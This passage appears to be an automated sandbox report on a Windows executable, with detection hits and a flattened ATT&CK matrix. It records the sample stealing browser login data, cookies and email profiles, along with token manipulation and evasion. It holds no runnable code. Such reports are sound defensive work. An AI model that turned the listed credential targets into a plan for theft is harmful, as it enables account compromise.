            Source: 4kobC6KGC3.exe, 00000002.00000002.54526176534.00000000079A5000.00000004.00000020.00020000.00000000.sdmp, 4kobC6KGC3.exe, 00000002.00000003.51266420350.00000000079B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-USn
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeAPI call chain: ExitProcess graph end nodegraph_0-4889
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeAPI call chain: ExitProcess graph end nodegraph_0-4883
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 0_2_70471B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70471B5F
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeProcess created: C:\Users\user\Desktop\4kobC6KGC3.exe "C:\Users\user\Desktop\4kobC6KGC3.exe"Jump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeQueries volume information: C:\Users\user\Desktop\4kobC6KGC3.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000002.00000002.54536508892.0000000037FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 4kobC6KGC3.exe PID: 1300, type: MEMORYSTR
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: Process Memory Space: 4kobC6KGC3.exe PID: 1300, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000002.00000002.54536508892.0000000037FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 4kobC6KGC3.exe PID: 1300, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            1
            OS Credential Dumping
            11
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            1
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            System Network Configuration Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            3
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS3
            File and Directory Discovery
            Distributed Component Object Model1
            Clipboard Data
            4
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets115
            System Information Discovery
            SSHKeylogging15
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.